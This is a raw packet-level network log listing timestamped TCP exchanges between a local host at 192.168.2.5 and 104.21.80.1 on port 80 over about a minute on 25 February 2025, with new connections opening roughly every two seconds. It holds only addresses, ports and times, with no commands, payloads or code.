Feb 25, 2025 15:37:46.549813986 CET	49900	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:46.553687096 CET	80	49900	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:47.691370010 CET	49912	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:47.696264029 CET	80	49912	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:47.696337938 CET	49912	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:47.698426962 CET	49912	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:47.703324080 CET	80	49912	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:47.703387022 CET	49912	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:47.708266973 CET	80	49912	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:48.491942883 CET	80	49912	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:48.492058039 CET	49912	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:48.493575096 CET	80	49912	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:48.493633986 CET	49912	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:48.500380993 CET	80	49912	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:49.644865036 CET	49927	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:49.650643110 CET	80	49927	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:49.650753021 CET	49927	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:49.652782917 CET	49927	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:49.658124924 CET	80	49927	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:49.658365011 CET	49927	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:49.663227081 CET	80	49927	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:50.278114080 CET	80	49927	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:50.278857946 CET	80	49927	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:50.279009104 CET	49927	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:50.279041052 CET	49927	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:50.284137964 CET	80	49927	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:51.458256006 CET	49938	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:51.463196039 CET	80	49938	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:51.463279963 CET	49938	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:51.465423107 CET	49938	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:51.470274925 CET	80	49938	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:51.470382929 CET	49938	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:51.475271940 CET	80	49938	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:52.092005968 CET	80	49938	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:52.092130899 CET	49938	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:52.093292952 CET	80	49938	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:52.093342066 CET	49938	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:52.097084999 CET	80	49938	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:53.237530947 CET	49951	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:53.242672920 CET	80	49951	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:53.245419025 CET	49951	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:53.247513056 CET	49951	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:53.252428055 CET	80	49951	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:53.252480984 CET	49951	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:53.257462978 CET	80	49951	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:54.032346964 CET	80	49951	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:54.032527924 CET	49951	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:54.032671928 CET	80	49951	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:54.032721043 CET	49951	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:54.037463903 CET	80	49951	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:55.176176071 CET	49966	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:55.181266069 CET	80	49966	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:55.181363106 CET	49966	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:55.183506966 CET	49966	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:55.190274954 CET	80	49966	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:55.190339088 CET	49966	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:55.195245981 CET	80	49966	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:55.982541084 CET	80	49966	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:55.982742071 CET	49966	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:55.984683037 CET	80	49966	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:55.984745979 CET	49966	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:55.989464045 CET	80	49966	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:57.132390022 CET	49981	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:57.138705015 CET	80	49981	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:57.138880968 CET	49981	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:57.141136885 CET	49981	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:57.145993948 CET	80	49981	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:57.146054983 CET	49981	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:57.150976896 CET	80	49981	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:57.885996103 CET	80	49981	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:57.886133909 CET	49981	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:57.886852026 CET	80	49981	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:57.886909008 CET	49981	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:57.891011953 CET	80	49981	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:59.036708117 CET	49993	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:59.045414925 CET	80	49993	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:59.045552015 CET	49993	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:59.047686100 CET	49993	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:59.054439068 CET	80	49993	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:59.054565907 CET	49993	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:59.061853886 CET	80	49993	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:59.770098925 CET	80	49993	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:59.770382881 CET	49993	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:59.770988941 CET	80	49993	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:59.771049023 CET	49993	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:59.775262117 CET	80	49993	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:00.911463976 CET	50004	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:00.916390896 CET	80	50004	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:00.916506052 CET	50004	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:00.918661118 CET	50004	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:00.923887968 CET	80	50004	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:00.923981905 CET	50004	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:00.929423094 CET	80	50004	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:01.586658955 CET	80	50004	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:01.586779118 CET	50004	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:01.588238955 CET	80	50004	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:01.588335037 CET	50004	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:01.591706991 CET	80	50004	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:03.117508888 CET	50007	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:03.122478008 CET	80	50007	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:03.122589111 CET	50007	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:03.124989033 CET	50007	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:03.129873037 CET	80	50007	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:03.129955053 CET	50007	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:03.134886026 CET	80	50007	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:03.857400894 CET	80	50007	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:03.857568026 CET	50007	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:03.858295918 CET	80	50007	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:03.858347893 CET	50007	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:03.862447023 CET	80	50007	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:05.005023956 CET	50008	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:05.010879040 CET	80	50008	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:05.010970116 CET	50008	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:05.013072968 CET	50008	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:05.018755913 CET	80	50008	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:05.018827915 CET	50008	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:05.023833990 CET	80	50008	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:05.746911049 CET	80	50008	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:05.747097015 CET	50008	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:05.748210907 CET	80	50008	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:05.748261929 CET	50008	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:05.751985073 CET	80	50008	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:06.925281048 CET	50009	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:06.930330038 CET	80	50009	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:06.930454969 CET	50009	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:06.932481050 CET	50009	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:06.937413931 CET	80	50009	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:06.937484026 CET	50009	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:06.942461014 CET	80	50009	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:07.690881014 CET	80	50009	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:07.691018105 CET	50009	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:07.691126108 CET	80	50009	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:07.691180944 CET	50009	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:07.695990086 CET	80	50009	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:08.831870079 CET	50010	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:08.836946011 CET	80	50010	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:08.837162018 CET	50010	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:08.838928938 CET	50010	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:08.844793081 CET	80	50010	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:08.844856977 CET	50010	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:08.850974083 CET	80	50010	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:09.620604992 CET	80	50010	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:09.620744944 CET	50010	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:09.620976925 CET	80	50010	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:09.621037006 CET	50010	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:09.625715971 CET	80	50010	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:10.788806915 CET	50011	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:10.793766022 CET	80	50011	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:10.794013977 CET	50011	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:10.796184063 CET	50011	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:10.801084995 CET	80	50011	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:10.801171064 CET	50011	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:10.806102037 CET	80	50011	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:11.587085009 CET	80	50011	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:11.587198973 CET	50011	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:11.587455988 CET	80	50011	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:11.587502956 CET	50011	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:11.592156887 CET	80	50011	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:12.723526955 CET	50012	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:12.728507042 CET	80	50012	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:12.728600025 CET	50012	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:12.730777979 CET	50012	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:12.738030910 CET	80	50012	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:12.738105059 CET	50012	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:12.743386030 CET	80	50012	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:13.468926907 CET	80	50012	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:13.469239950 CET	50012	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:13.469522953 CET	80	50012	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:13.469630003 CET	50012	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:13.474455118 CET	80	50012	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:14.628496885 CET	50013	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:14.633577108 CET	80	50013	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:14.633691072 CET	50013	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:14.635822058 CET	50013	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:14.640790939 CET	80	50013	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:14.640871048 CET	50013	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:14.645770073 CET	80	50013	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:15.300654888 CET	80	50013	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:15.301033020 CET	80	50013	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:15.301112890 CET	50013	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:15.301161051 CET	50013	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:15.306085110 CET	80	50013	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:16.442960978 CET	50014	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:16.448005915 CET	80	50014	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:16.448154926 CET	50014	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:16.450267076 CET	50014	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:16.455244064 CET	80	50014	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:16.455339909 CET	50014	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:16.460412979 CET	80	50014	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:17.250334978 CET	80	50014	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:17.251007080 CET	50014	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:17.251194954 CET	80	50014	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:17.251246929 CET	50014	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:17.256006002 CET	80	50014	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:18.409554005 CET	50015	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:18.414499044 CET	80	50015	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:18.414587975 CET	50015	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:18.416731119 CET	50015	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:18.421669006 CET	80	50015	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:18.421744108 CET	50015	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:18.426722050 CET	80	50015	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:19.189032078 CET	80	50015	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:19.189291000 CET	50015	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:19.189532995 CET	80	50015	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:19.189611912 CET	50015	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:19.194865942 CET	80	50015	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:20.362278938 CET	50016	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:20.367302895 CET	80	50016	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:20.367489100 CET	50016	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:20.369366884 CET	50016	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:20.374263048 CET	80	50016	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:20.374351025 CET	50016	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:20.379390955 CET	80	50016	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:21.132527113 CET	80	50016	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:21.132719994 CET	50016	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:21.133462906 CET	80	50016	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:21.133522987 CET	50016	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:21.137675047 CET	80	50016	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:22.273369074 CET	50017	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:22.278278112 CET	80	50017	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:22.278378010 CET	50017	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:22.280528069 CET	50017	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:22.285406113 CET	80	50017	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:22.285474062 CET	50017	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:22.290386915 CET	80	50017	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:23.046591043 CET	80	50017	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:23.046793938 CET	50017	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:23.047426939 CET	80	50017	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:23.047480106 CET	50017	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:23.051657915 CET	80	50017	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:24.194916010 CET	50018	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:24.199903965 CET	80	50018	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:24.202914000 CET	50018	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:24.202914000 CET	50018	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:24.208935976 CET	80	50018	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:24.210908890 CET	50018	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:24.215764999 CET	80	50018	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:24.975321054 CET	80	50018	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:24.975433111 CET	50018	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:24.976176023 CET	80	50018	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:24.976228952 CET	50018	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:24.980448008 CET	80	50018	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:26.116480112 CET	50019	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:26.121562004 CET	80	50019	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:26.121654987 CET	50019	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:26.123744965 CET	50019	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:26.128623962 CET	80	50019	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:26.128726959 CET	50019	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:26.133652925 CET	80	50019	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:26.761888027 CET	80	50019	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:26.762044907 CET	50019	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:26.762461901 CET	80	50019	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:26.762522936 CET	50019	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:26.767054081 CET	80	50019	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:27.918128967 CET	50020	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:27.923213959 CET	80	50020	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:27.923310041 CET	50020	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:27.925673008 CET	50020	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:27.930615902 CET	80	50020	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:27.930674076 CET	50020	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:27.935539961 CET	80	50020	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:29.017333984 CET	80	50020	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:29.017491102 CET	50020	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:29.018630028 CET	80	50020	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:29.018682003 CET	50020	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:29.022377968 CET	80	50020	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:30.180537939 CET	50021	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:30.185641050 CET	80	50021	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:30.185724974 CET	50021	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:30.187870979 CET	50021	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:30.192841053 CET	80	50021	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:30.192909956 CET	50021	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:30.197856903 CET	80	50021	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:30.915257931 CET	80	50021	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:30.915397882 CET	50021	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:30.916085958 CET	80	50021	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:30.916140079 CET	50021	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:30.920370102 CET	80	50021	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:32.057874918 CET	50022	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:32.062804937 CET	80	50022	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:32.062880039 CET	50022	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:32.065331936 CET	50022	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:32.070252895 CET	80	50022	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:32.070313931 CET	50022	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:32.075217009 CET	80	50022	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:32.856038094 CET	80	50022	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:32.856226921 CET	50022	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:32.856549025 CET	80	50022	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:32.856614113 CET	50022	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:32.861222029 CET	80	50022	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:34.037117958 CET	50023	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:34.042073011 CET	80	50023	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:34.042157888 CET	50023	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:34.044276953 CET	50023	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:34.049240112 CET	80	50023	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:34.049302101 CET	50023	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:34.054236889 CET	80	50023	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:34.780853033 CET	80	50023	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:34.781431913 CET	80	50023	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:34.781548023 CET	50023	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:34.781703949 CET	50023	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:34.786591053 CET	80	50023	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:35.950638056 CET	50024	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:35.955667973 CET	80	50024	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:35.955759048 CET	50024	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:35.957895041 CET	50024	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:35.962832928 CET	80	50024	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:35.962917089 CET	50024	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:35.967854977 CET	80	50024	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:36.734057903 CET	80	50024	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:36.734247923 CET	50024	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:36.736174107 CET	80	50024	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:36.736248016 CET	50024	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:36.739222050 CET	80	50024	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:37.915138006 CET	50025	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:37.920094967 CET	80	50025	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:37.920186043 CET	50025	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:37.922226906 CET	50025	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:37.927162886 CET	80	50025	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:37.927242041 CET	50025	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:37.932209015 CET	80	50025	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:38.674113035 CET	80	50025	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:38.674221992 CET	80	50025	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:38.674350977 CET	50025	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:38.674638033 CET	50025	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:38.679332018 CET	80	50025	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:39.828588963 CET	50026	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:39.833576918 CET	80	50026	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:39.833683968 CET	50026	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:39.835803032 CET	50026	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:39.840814114 CET	80	50026	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:39.840893984 CET	50026	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:39.845809937 CET	80	50026	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:40.633027077 CET	80	50026	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:40.633044958 CET	80	50026	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:40.633068085 CET	80	50026	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:40.633202076 CET	50026	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:40.637554884 CET	50026	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:40.642548084 CET	80	50026	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:41.794477940 CET	50027	80	192.168.2.5	104.21.80.1
